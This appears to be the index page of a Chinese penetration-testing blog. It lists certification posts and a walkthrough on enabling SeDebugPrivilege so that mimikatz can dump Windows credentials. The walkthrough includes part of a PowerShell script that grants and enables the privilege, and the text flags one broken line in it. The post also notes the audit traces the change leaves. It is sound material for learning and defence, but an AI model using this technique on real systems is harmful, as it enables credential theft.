<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<script id="hexo-configurations">
// Theme bootstrap inlined by the static-site generator (see <meta name="generator" content="Hexo 4.2.1">
// above; CONFIG.version "7.8.0" / scheme "Gemini" look like the NexT theme, whose bundled scripts
// presumably read `NexT` and `CONFIG` — confirm against the files under /js and /lib).
// Reuse an already-initialised global `NexT` namespace if one exists, otherwise start an empty object.
var NexT = window.NexT || {};
// Site-wide, build-time constants consumed client-side: canonical hostname/root, sidebar and motion
// (animation) behaviour, copy-code button, Algolia UI labels, and local search (enabled, index fetched
// from `path` "search.xml" on this same origin; `unescape:false` presumably keeps result snippets
// HTML-escaped — verify in the theme's search script before relying on it).
// NOTE(review): this is an inline <script>; a strict Content-Security-Policy would need a nonce or
// hash for it. The values are generated at build time from the site config, not from request input.
var CONFIG = {"hostname":"n0maj1o24.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
</script>
<meta property="og:type" content="website">
<meta property="og:title" content="Technical Memorandum">
<meta property="og:url" content="https://n0maj1o24.github.io/index.html">
<meta property="og:site_name" content="Technical Memorandum">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="n0maj1o24">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://n0maj1o24.github.io/">
<script id="page-configurations">
// https://hexo.io/docs/variables.html
// Per-page flags attached to the site-wide CONFIG object declared in the preceding inline script.
// This is the home/index listing rather than a single post, so `sidebar` is empty, `isHome` is true
// and `isPost` is false; `lang` mirrors the <html lang="zh-CN"> attribute. Generated at build time.
// NOTE(review): inline <script> — needs a CSP nonce/hash if a strict policy is ever applied.
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'zh-CN'
};
</script>
<title>Technical Memorandum</title>
<noscript>
<style>
/* No-JavaScript fallback (this block lives inside <noscript>). CONFIG.motion.enable is true, so the
   theme's scripts presumably animate these elements in from a hidden/offset state; when scripts are
   disabled or blocked they would otherwise never become visible. Resetting opacity and the
   positional offsets to `initial` keeps the page readable without JS. */
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
/* Title and subtitle are also offset vertically by the slide-in animation; undo that too. */
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
/* Decorative logo lines are animated horizontally; restore their resting position. */
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">Technical Memorandum</h1>
<span class="logo-line-after"><i></i></span>
</a>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-about">
<a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup">
<div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off"
placeholder="搜索..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div id="search-result">
<div id="no-result">
<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
</div>
</div>
</div>
</div>
</div>
</header>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content index posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/10/03/OSCE3-Certification-From-Zero-to-One/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/10/03/OSCE3-Certification-From-Zero-to-One/" class="post-title-link" itemprop="url">OSCE3 Certification: From Zero to One</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-10-02 21:10:56 / 修改时间:13:19:29" itemprop="dateCreated datePublished" datetime="2022-10-02T21:10:56Z">2022-10-02</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/10/03/OSCE3-Certification-From-Zero-to-One/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/10/03/OSCE3-Certification-From-Zero-to-One/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>花了一些时间,拿到了Offensive Security的4个证书。</p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSCE3.png" alt="OSCE3"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSWE.png" alt="OSWE"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSCP.png" alt="OSCP"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSED.png" alt="OSED"></p>
<p><img src="/2022/10/03/OSCE3-Certification-From-Zero-to-One/OSEP.png" alt="OSEP"></p>
<p>下面是我关于4个证书的备考总结,分享给大家:</p>
<p><a href="https://n0maj1o24.notion.site/OSCE3-8cba8825129441aba5d0b7a78961f5bf" target="_blank" rel="noopener">https://n0maj1o24.notion.site/OSCE3-8cba8825129441aba5d0b7a78961f5bf</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/09/03/HTB-Pro-Offshore-Review/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/09/03/HTB-Pro-Offshore-Review/" class="post-title-link" itemprop="url">HTB Pro:Offshore Review</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-09-02 22:14:08" itemprop="dateCreated datePublished" datetime="2022-09-02T22:14:08Z">2022-09-02</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2022-09-03 07:04:27" itemprop="dateModified" datetime="2022-09-03T07:04:27Z">2022-09-03</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/09/03/HTB-Pro-Offshore-Review/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/09/03/HTB-Pro-Offshore-Review/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>完成HTB Pro Offshore实验。</p>
<p>证书:</p>
<p><img src="/2022/09/03/HTB-Pro-Offshore-Review/01.png" alt="offshore"></p>
<p>详情查看:</p>
<p><a href="https://n0maj1o24.notion.site/HTB-Pro-Offshore-Review-52158272e2b048e8b8a998a6a7723966" target="_blank" rel="noopener">https://n0maj1o24.notion.site/HTB-Pro-Offshore-Review-52158272e2b048e8b8a998a6a7723966</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://n0maj1o24.github.io/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.jpeg">
<meta itemprop="name" content="n0maj1o24">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Technical Memorandum">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/" class="post-title-link" itemprop="url">SeDebugPrivilege未设置导致的小问题</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2022-08-17 10:25:35 / 修改时间:06:32:20" itemprop="dateCreated datePublished" datetime="2022-08-17T10:25:35Z">2022-08-17</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/Penetration-Testing/" itemprop="url" rel="index"><span itemprop="name">Penetration Testing</span></a>
</span>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-comment"></i>
</span>
<span class="post-meta-item-text">Valine:</span>
<a title="valine" href="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/#valine-comments" itemprop="discussionUrl">
<span class="post-comments-count valine-comment-count" data-xid="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/" itemprop="commentCount"></span>
</a>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>最近,在渗透测试抓取密码的时候,出现如下问题:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/03.png" alt="Sed"></p>
<p>一般出现这个问题是因为当前<code>cmd</code>权限不够,这里的<code>cmd</code>已经是管理员权限,所以有点奇怪,现在来进行排查,查看当前用户的信息:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/00.png" alt="Sed"></p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/01.png" alt="Sed"></p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/02.png" alt="Sed"></p>
<p>虽然当前用户在管理员组,但是<code>SeDebugPrivilege</code>权限竟然没有设置,这个比较奇怪。默认情况下 Administrators 组拥有“调试程序”(Debug programs)这项用户权限;它完全不出现在 <code>whoami /priv</code> 的列表里(而不是显示为 <code>Disabled</code>),说明本机或域的安全策略很可能已经把该权限从 Administrators 组移除——这是一种常见的加固配置。原因就出在这里:令牌中根本不包含 <code>SeDebugPrivilege</code>,自然也就无法 <strong>Enable SeDebugPrivilege</strong>。</p>
<p>现在来开启<code>SeDebugPrivilege</code>。</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/05.png" alt="Sed"></p>
<p>注意,给当前用户加入<code>SeDebugPrivilege</code>权限之后,需要重新登录(或重启机器),然后再进行操作。用户权限是在登录时写入访问令牌的,修改 LSA 策略并不会影响已经存在的令牌,所以上图后续几步在同一个会话里对当前进程执行其实是无效的——必须拿到一个新的登录令牌(注销后重新登录、建立新的远程登录,或者重启)之后再试。另外,这一步修改的是本机安全策略,在开启了相应审计的环境里会产生“已分配用户权限”(安全日志事件 ID 4704)之类的记录,渗透测试时要注意留痕。</p>
<p>重启之后,查看用户权限:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/06.png" alt="Sed"></p>
<p>继续来一遍之前的操作:</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/07.png" alt="Sed"></p>
<p>可以发现,现在<code>SeDebugPrivilege</code>已经变为<code>Enabled</code>了。</p>
<p>再次运行mimikatz,发现可以抓取密码了。(<code>SeDebugPrivilege</code> 解决的只是以非 SYSTEM 身份打开 LSASS 进程句柄的权限问题;如果目标启用了 LSA 保护(RunAsPPL)或 Credential Guard,即使拥有该权限也无法直接读取凭据,需要另寻他法。)</p>
<p><img src="/2022/08/17/SeDebugPrivilege%E6%9C%AA%E8%AE%BE%E7%BD%AE%E5%AF%BC%E8%87%B4%E7%9A%84%E5%B0%8F%E9%97%AE%E9%A2%98/08.png" alt="Sed"></p>
<p>SetSeDebugPrivilege.ps1源码如下。注意:下面 <code>[LsaWrapper]::SetRight($AccountName, s)</code> 一行的第二个参数是裸字符 <code>s</code>,PowerShell 在方法调用里会把它当作解析错误;结合 <code>Param</code> 中声明了却没有使用的 <code>$Privilege</code>,这里应为 <code>$Privilege</code>(或直接写 <code>"SeDebugPrivilege"</code>),使用前请与原始脚本核对。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span 
class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span 
class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span 
class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span 
class="keyword">function</span> <span class="title">Main</span></span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">Param</span> (</span><br><span class="line"> [<span class="type">parameter</span>(<span class="type">Mandatory</span>=<span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">string</span>]<span class="variable">$AccountName</span>,</span><br><span class="line"> [<span class="type">parameter</span>(<span class="type">Mandatory</span>=<span class="variable">$True</span>)]</span><br><span class="line"> [<span class="built_in">string</span>]<span class="variable">$Privilege</span></span><br><span class="line"> )</span><br><span class="line"> <span class="variable">$ErrorActionPreference</span> = <span class="string">"Stop"</span></span><br><span class="line"> <span class="variable">$VerbosePreference</span> = <span class="string">"Continue"</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">#Target account to assign previlage</span></span><br><span class="line"> <span class="variable">$IsAdmin</span> = ([<span class="type">Security.Principal.WindowsPrincipal</span>][<span class="type">Security.Principal.WindowsIdentity</span>]::GetCurrent()).IsInRole([<span class="type">Security.Principal.WindowsBuiltInRole</span>]<span class="string">'Administrator'</span>)</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Needs Admin privs</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$IsAdmin</span>) {</span><br><span class="line"> echo <span class="string">"`n[!] 
Administrator privileges are required!`n"</span></span><br><span class="line"> <span class="keyword">Return</span></span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="variable">$Whoami</span> = whoami /priv /fo csv |<span class="built_in">ConvertFrom-Csv</span></span><br><span class="line"> <span class="variable">$SeDebugPriv</span> = <span class="variable">$whoami</span> <span class="operator">-Match</span> <span class="string">"SeDebugPrivilege"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># SeDebugPriv needs to be available</span></span><br><span class="line"> <span class="keyword">if</span> (!<span class="variable">$SeDebugPriv</span>) {</span><br><span class="line"> echo <span class="string">"`n[!] SeDebugPrivilege not available, available it!"</span></span><br><span class="line"> <span class="built_in">Write-Verbose</span> (<span class="string">"Set account privilage({0}) to '{1}'"</span> <span class="operator">-f</span> <span class="string">"SeDebugPrivilege"</span>, <span class="variable">$AccountName</span>)</span><br><span class="line"> [<span class="type">LsaWrapper</span>]::SetRight(<span class="variable">$AccountName</span>, s)</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"> echo <span class="string">"`n[?] 
SeDebugPrivilege is available now!"</span></span><br><span class="line"> <span class="keyword">foreach</span> (<span class="variable">$priv</span> <span class="keyword">in</span> <span class="variable">$whoami</span>) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$priv</span>.<span class="string">"Privilege Name"</span> <span class="operator">-contains</span> <span class="string">"SeDebugPrivilege"</span>) {</span><br><span class="line"> <span class="variable">$DebugVal</span> = <span class="variable">$priv</span>.State</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get current proc handle</span></span><br><span class="line"> <span class="variable">$ProcHandle</span> = (<span class="built_in">Get-Process</span> <span class="literal">-Id</span> ([<span class="type">System.Diagnostics.Process</span>]::GetCurrentProcess().Id)).Handle</span><br><span class="line"> echo <span class="string">"`n[+] Current process handle: <span class="variable">$ProcHandle</span>"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Open token handle with TOKEN_ADJUST_PRIVILEGES bor TOKEN_QUERY</span></span><br><span class="line"> echo <span class="string">"`n[>] Calling Advapi32::OpenProcessToken"</span></span><br><span class="line"> <span class="variable">$hTokenHandle</span> = [<span class="built_in">Int</span><span class="type">Ptr</span>]::Zero</span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::OpenProcessToken(<span class="variable">$ProcHandle</span>, <span class="number">0</span>x28, [<span class="type">ref</span>]<span class="variable">$hTokenHandle</span>)</span><br><span class="line"> echo <span class="string">"[+] Token handle with TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY: <span class="variable">$hTokenHandle</span>`n"</span></span><br><span 
class="line"> </span><br><span class="line"> <span class="comment"># Enable SeDebugPrivilege if needed</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$DebugVal</span> <span class="operator">-eq</span> <span class="string">"Disabled"</span>) {</span><br><span class="line"> echo <span class="string">"[?] SeDebugPrivilege is disabled, enabling..`n"</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Prepare TokPriv1Luid container</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span> = <span class="built_in">New-Object</span> TokPriv1Luid</span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Count = <span class="number">1</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Attr = <span class="number">0</span>x00000002 <span class="comment"># SE_PRIVILEGE_ENABLED</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment"># Get SeDebugPrivilege luid</span></span><br><span class="line"> <span class="variable">$LuidVal</span> = <span class="variable">$Null</span></span><br><span class="line"> echo <span class="string">"[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege"</span></span><br><span class="line"> <span class="variable">$CallResult</span> = [<span class="type">Advapi32</span>]::LookupPrivilegeValue(<span class="variable">$null</span>, <span class="string">"SeDebugPrivilege"</span>, [<span class="type">ref</span>]<span class="variable">$LuidVal</span>)</span><br><span class="line"> echo <span class="string">"[+] SeDebugPrivilege LUID value: <span class="variable">$LuidVal</span>`n"</span></span><br><span class="line"> <span class="variable">$TokPriv1Luid</span>.Luid = <span class="variable">$LuidVal</span></span><br><span class="line"> </span><br><span 